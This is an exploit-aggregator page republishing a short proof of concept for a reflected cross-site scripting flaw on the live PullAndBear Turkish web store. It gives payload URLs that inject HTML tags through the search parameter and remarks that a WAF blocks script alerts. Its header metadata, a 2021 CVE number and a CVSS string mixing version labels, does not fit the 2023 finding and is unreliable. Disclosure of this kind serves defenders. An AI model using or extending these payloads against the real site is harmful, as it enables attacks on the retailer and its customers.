Advertisement






PullAndBear Reflected XSS Vulnerability

CVE Category Price Severity
CVE-2021-3521 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-07-26
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070066

Below is a copy:

PullAndBear Reflected XSS Vulnerability
#Exploit Title: PullAndBear Reflected XSS Vulnerability
#Date: 24-07-2023
#Exploit Author: BQX ( ./Bertw_QX )
#Vendor Homepage: https://www.pullandbear.com/
#Category: Reflected XSS
#Tested On: Windows 10 - Google Chrome

https://www.pullandbear.com/tr/erkek-n6228?q=<b>test</b>
https://www.pullandbear.com/tr/erkek-n6228?q=<iframe></iframe>

The html codes written after the ?q= parameter are executed on the page.

Not: Because of waf, codes like alert don't work
err: Access Denied
You don't have permission to access "https://www.pullandbear.com/tr/erkek-n6228?q=" on this server.
Reference #18.7fc11302.1690229077.2415c6fa

*********************************************************
#Telegram: @bqxsec
#Telegram Channel: t.me/zerotolerance_hack
#Instagram: @bqxsec
#Mail: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.